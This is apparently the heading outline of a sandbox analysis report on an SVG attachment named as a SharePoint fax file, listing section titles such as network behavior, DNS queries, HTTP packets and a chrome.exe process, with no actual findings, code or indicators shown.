Chrome Cache Entry: 48

Chrome Cache Entry: 49

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6924, Parent PID: 1492

General

File Activities

File Opened

File Created

File Deleted

File Moved

Windows Analysis Report
FaxLine832699141Sharepoint_WIHVRVZAIU_attach.svg